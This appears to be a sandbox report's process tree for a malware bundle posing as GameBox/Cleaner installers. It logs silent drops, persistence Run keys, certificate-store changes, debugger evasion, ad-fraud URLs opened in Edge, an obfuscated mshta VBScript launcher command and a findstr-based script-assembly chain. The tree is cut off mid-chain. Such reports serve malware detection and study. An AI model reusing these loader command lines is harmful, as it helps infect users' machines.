C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629316234 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:4496
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:2660
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\is-D3V4O.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-D3V4O.tmp\VPN.tmp" /SL5="$20330,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:3496 -
C:\Users\Admin\AppData\Local\Temp\is-059PP.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-059PP.tmp\Setup.exe" /silent /subid=7207⤵PID:7076
-
C:\Users\Admin\AppData\Local\Temp\is-TP7CB.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-TP7CB.tmp\Setup.tmp" /SL5="$2049E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-059PP.tmp\Setup.exe" /silent /subid=7208⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6072 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:6220
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵
- Checks SCSI registry key(s)
PID:5956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:3172
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:6228
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4656
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7004
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
PID:960
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵PID:1248
-
C:\Users\Admin\AppData\Local\Temp\is-AIJKJ.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-AIJKJ.tmp\MediaBurner2.tmp" /SL5="$20410,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵PID:3228
-
C:\Users\Admin\AppData\Local\Temp\is-13EAF.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-13EAF.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
PID:4528 -
C:\Program Files\Windows Defender\TVKRICJOTS\ultramediaburner.exe"C:\Program Files\Windows Defender\TVKRICJOTS\ultramediaburner.exe" /VERYSILENT8⤵PID:2836
-
C:\Users\Admin\AppData\Local\Temp\is-6CJ5V.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-6CJ5V.tmp\ultramediaburner.tmp" /SL5="$A01E4,281924,62464,C:\Program Files\Windows Defender\TVKRICJOTS\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
PID:4660 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:3600
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6d-f890d-150-e1784-2561a4c02bdc6\Lyjyzhiqaewu.exe"C:\Users\Admin\AppData\Local\Temp\6d-f890d-150-e1784-2561a4c02bdc6\Lyjyzhiqaewu.exe"8⤵PID:5236
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵PID:2536
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x178,0x1f0,0x7ff9f57846f8,0x7ff9f5784708,0x7ff9f578471810⤵PID:7860
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad9⤵PID:4516
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f57846f8,0x7ff9f5784708,0x7ff9f578471810⤵PID:4100
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18514839⤵PID:4776
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f57846f8,0x7ff9f5784708,0x7ff9f578471810⤵PID:8036
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=18515139⤵PID:6956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe0,0x10c,0x7ff9f57846f8,0x7ff9f5784708,0x7ff9f578471810⤵PID:8144
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=20872159⤵PID:852
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f57846f8,0x7ff9f5784708,0x7ff9f578471810⤵PID:7564
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=42631199⤵PID:4400
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9f57846f8,0x7ff9f5784708,0x7ff9f578471810⤵PID:1504
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ae-405f3-fe3-cab86-0ded6f4558c1e\Vycedobeqi.exe"C:\Users\Admin\AppData\Local\Temp\ae-405f3-fe3-cab86-0ded6f4558c1e\Vycedobeqi.exe"8⤵PID:6004
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ywemh4sa.gxu\GcleanerEU.exe /eufive & exit9⤵PID:7684
-
C:\Users\Admin\AppData\Local\Temp\ywemh4sa.gxu\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\ywemh4sa.gxu\GcleanerEU.exe /eufive10⤵PID:7628
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7628 -s 29211⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7500
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lz1213gq.1c1\installer.exe /qn CAMPAIGN="654" & exit9⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\lz1213gq.1c1\installer.exeC:\Users\Admin\AppData\Local\Temp\lz1213gq.1c1\installer.exe /qn CAMPAIGN="654"10⤵
- Loads dropped DLL
- Enumerates connected drives
PID:7740 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\lz1213gq.1c1\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\lz1213gq.1c1\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629316234 /qn CAMPAIGN=""654"" " CAMPAIGN="654"11⤵PID:4956
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hnb05zx4.by3\ufgaa.exe & exit9⤵PID:6380
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0izo4iht.dkk\anyname.exe & exit9⤵PID:3704
-
C:\Users\Admin\AppData\Local\Temp\0izo4iht.dkk\anyname.exeC:\Users\Admin\AppData\Local\Temp\0izo4iht.dkk\anyname.exe10⤵PID:4100
-
C:\Users\Admin\AppData\Local\Temp\0izo4iht.dkk\anyname.exe"C:\Users\Admin\AppData\Local\Temp\0izo4iht.dkk\anyname.exe" -q11⤵PID:1364
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s5xeluta.0kh\gcleaner.exe /mixfive & exit9⤵PID:6012
-
C:\Users\Admin\AppData\Local\Temp\s5xeluta.0kh\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\s5xeluta.0kh\gcleaner.exe /mixfive10⤵PID:4348
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 29611⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3848
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0rf0ucj2.3mu\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
PID:7532
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
- Executes dropped EXE
PID:4768 -
C:\Users\Admin\AppData\Roaming\3874298.exe"C:\Users\Admin\AppData\Roaming\3874298.exe"6⤵
- Executes dropped EXE
PID:5576 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 5576 -s 23927⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4860
-
-
-
C:\Users\Admin\AppData\Roaming\7529954.exe"C:\Users\Admin\AppData\Roaming\7529954.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5696 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:2112
-
-
-
C:\Users\Admin\AppData\Roaming\7643317.exe"C:\Users\Admin\AppData\Roaming\7643317.exe"6⤵
- Executes dropped EXE
PID:5824
-
-
C:\Users\Admin\AppData\Roaming\1736868.exe"C:\Users\Admin\AppData\Roaming\1736868.exe"6⤵
- Executes dropped EXE
PID:5972
-
-
C:\Users\Admin\AppData\Roaming\8428532.exe"C:\Users\Admin\AppData\Roaming\8428532.exe"6⤵
- Executes dropped EXE
PID:1028 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1028 -s 23247⤵
- Program crash
PID:6356
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
- Executes dropped EXE
PID:3300 -
C:\Users\Admin\Documents\fN0NDyywugYgPMHyvczMUATY.exe"C:\Users\Admin\Documents\fN0NDyywugYgPMHyvczMUATY.exe"6⤵PID:5924
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5924 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2128
-
-
-
C:\Users\Admin\Documents\oClcNqlp2Bh86AeVb_baSYRv.exe"C:\Users\Admin\Documents\oClcNqlp2Bh86AeVb_baSYRv.exe"6⤵PID:4860
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\oClcNqlp2Bh86AeVb_baSYRv.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\oClcNqlp2Bh86AeVb_baSYRv.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )7⤵PID:6296
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\oClcNqlp2Bh86AeVb_baSYRv.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\oClcNqlp2Bh86AeVb_baSYRv.exe" ) do taskkill -f -iM "%~NxA"8⤵PID:6768
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "oClcNqlp2Bh86AeVb_baSYRv.exe"9⤵
- Kills process with taskkill
PID:7164
-
-
-
-
-
C:\Users\Admin\Documents\6moy6ZUQk6HST4lKiS4dsYv2.exe"C:\Users\Admin\Documents\6moy6ZUQk6HST4lKiS4dsYv2.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5140
-
-
C:\Users\Admin\Documents\RK4JhWyyV2gZRlLMqbVEjvgp.exe"C:\Users\Admin\Documents\RK4JhWyyV2gZRlLMqbVEjvgp.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1056
-
-
C:\Users\Admin\Documents\tC4kWSH8sI_tA5HhdT8NgRJN.exe"C:\Users\Admin\Documents\tC4kWSH8sI_tA5HhdT8NgRJN.exe"6⤵PID:2104
-
C:\Users\Admin\Documents\tC4kWSH8sI_tA5HhdT8NgRJN.exe"C:\Users\Admin\Documents\tC4kWSH8sI_tA5HhdT8NgRJN.exe" -q7⤵PID:7156
-
-
-
C:\Users\Admin\Documents\aVS9KSwMmD2PoqoEkDuizSV3.exe"C:\Users\Admin\Documents\aVS9KSwMmD2PoqoEkDuizSV3.exe"6⤵PID:492
-
-
C:\Users\Admin\Documents\e2WG0rRYFvdmNtudfCyYD0zQ.exe"C:\Users\Admin\Documents\e2WG0rRYFvdmNtudfCyYD0zQ.exe"6⤵PID:6032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6024
-
-
-
C:\Users\Admin\Documents\dgt7AGNue01k0B59o6MJ4yTE.exe"C:\Users\Admin\Documents\dgt7AGNue01k0B59o6MJ4yTE.exe"6⤵PID:6288
-
-
C:\Users\Admin\Documents\yiFKNT0nr7imekCPhRNhbie_.exe"C:\Users\Admin\Documents\yiFKNT0nr7imekCPhRNhbie_.exe"6⤵
- Suspicious use of SetThreadContext
PID:6280 -
C:\Users\Admin\Documents\yiFKNT0nr7imekCPhRNhbie_.exeC:\Users\Admin\Documents\yiFKNT0nr7imekCPhRNhbie_.exe7⤵PID:6688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6688 -s 288⤵
- Program crash
PID:784
-
-
-
-
C:\Users\Admin\Documents\Dooa5fk9AQ4epkU4HEsJiA0t.exe"C:\Users\Admin\Documents\Dooa5fk9AQ4epkU4HEsJiA0t.exe"6⤵PID:6272
-
-
C:\Users\Admin\Documents\C5I7tQVjwycOaAVg9JW27ECG.exe"C:\Users\Admin\Documents\C5I7tQVjwycOaAVg9JW27ECG.exe"6⤵PID:5836
-
-
C:\Users\Admin\Documents\jIlgGsLgcRdga5MKGVReTCua.exe"C:\Users\Admin\Documents\jIlgGsLgcRdga5MKGVReTCua.exe"6⤵
- Suspicious use of SetThreadContext
PID:4836 -
C:\Users\Admin\Documents\jIlgGsLgcRdga5MKGVReTCua.exeC:\Users\Admin\Documents\jIlgGsLgcRdga5MKGVReTCua.exe7⤵PID:6748
-
-
-
C:\Users\Admin\Documents\IdYe_ZwytQK0N9XMqLr6tNKJ.exe"C:\Users\Admin\Documents\IdYe_ZwytQK0N9XMqLr6tNKJ.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5984
-
-
C:\Users\Admin\Documents\Yg4KwUXG4NYn7FEVcqMPVNb7.exe"C:\Users\Admin\Documents\Yg4KwUXG4NYn7FEVcqMPVNb7.exe"6⤵PID:5916
-
C:\Users\Admin\AppData\Roaming\6669506.exe"C:\Users\Admin\AppData\Roaming\6669506.exe"7⤵PID:7020
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 7020 -s 23408⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5504
-
-
-
C:\Users\Admin\AppData\Roaming\6399527.exe"C:\Users\Admin\AppData\Roaming\6399527.exe"7⤵PID:6636
-
-
C:\Users\Admin\AppData\Roaming\4000629.exe"C:\Users\Admin\AppData\Roaming\4000629.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:6444
-
-
C:\Users\Admin\AppData\Roaming\2500308.exe"C:\Users\Admin\AppData\Roaming\2500308.exe"7⤵PID:4368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 24688⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5136
-
-
-
-
C:\Users\Admin\Documents\uAbmvuYWyPNMcJ17bWYvR_iG.exe"C:\Users\Admin\Documents\uAbmvuYWyPNMcJ17bWYvR_iG.exe"6⤵
- Suspicious use of SetThreadContext
PID:5900 -
C:\Users\Admin\Documents\uAbmvuYWyPNMcJ17bWYvR_iG.exe"C:\Users\Admin\Documents\uAbmvuYWyPNMcJ17bWYvR_iG.exe"7⤵PID:7048
-
-
-
C:\Users\Admin\Documents\x3yIJaC6IBA7XX4i4dYBcEgM.exe"C:\Users\Admin\Documents\x3yIJaC6IBA7XX4i4dYBcEgM.exe"6⤵PID:5892
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4044
-
-
-
C:\Users\Admin\Documents\7HxSIMF91ZUuou2cZnhLEZDZ.exe"C:\Users\Admin\Documents\7HxSIMF91ZUuou2cZnhLEZDZ.exe"6⤵PID:5780
-
-
C:\Users\Admin\Documents\8lmDih8V2BGpLnds_D6VngZP.exe"C:\Users\Admin\Documents\8lmDih8V2BGpLnds_D6VngZP.exe"6⤵
- Executes dropped EXE
PID:5876 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5876 -s 3127⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5780
-
-
-
C:\Users\Admin\Documents\lJbTck088lHvWeCNKbcD_h4M.exe"C:\Users\Admin\Documents\lJbTck088lHvWeCNKbcD_h4M.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5820
-
-
C:\Users\Admin\Documents\0HlVITTuFEgXTQKLdxctFRHr.exe"C:\Users\Admin\Documents\0HlVITTuFEgXTQKLdxctFRHr.exe"6⤵PID:6580
-
C:\Users\Admin\AppData\Local\Temp\is-QECKN.tmp\0HlVITTuFEgXTQKLdxctFRHr.tmp"C:\Users\Admin\AppData\Local\Temp\is-QECKN.tmp\0HlVITTuFEgXTQKLdxctFRHr.tmp" /SL5="$30278,138429,56832,C:\Users\Admin\Documents\0HlVITTuFEgXTQKLdxctFRHr.exe"7⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:6884 -
C:\Users\Admin\AppData\Local\Temp\is-3HCO0.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-3HCO0.tmp\Setup.exe" /Verysilent8⤵
- Drops file in Program Files directory
PID:1204 -
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6808 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629316234 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:6788
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
PID:2976 -
C:\Users\Admin\AppData\Local\Temp\tmp7129_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp7129_tmp.exe"6⤵PID:5796
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵PID:6796
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵PID:6064
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:5872
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵PID:4116
-
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 309⤵
- Runs ping.exe
PID:7092
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:7048 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵PID:4012
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵PID:3680
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵
- Enumerates system info in registry
- Suspicious use of SendNotifyMessage
PID:1192 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵PID:6136
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵PID:7448
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i15⤵
- Suspicious use of SendNotifyMessage
PID:8068 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i16⤵
- Suspicious use of SendNotifyMessage
PID:3852 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i17⤵
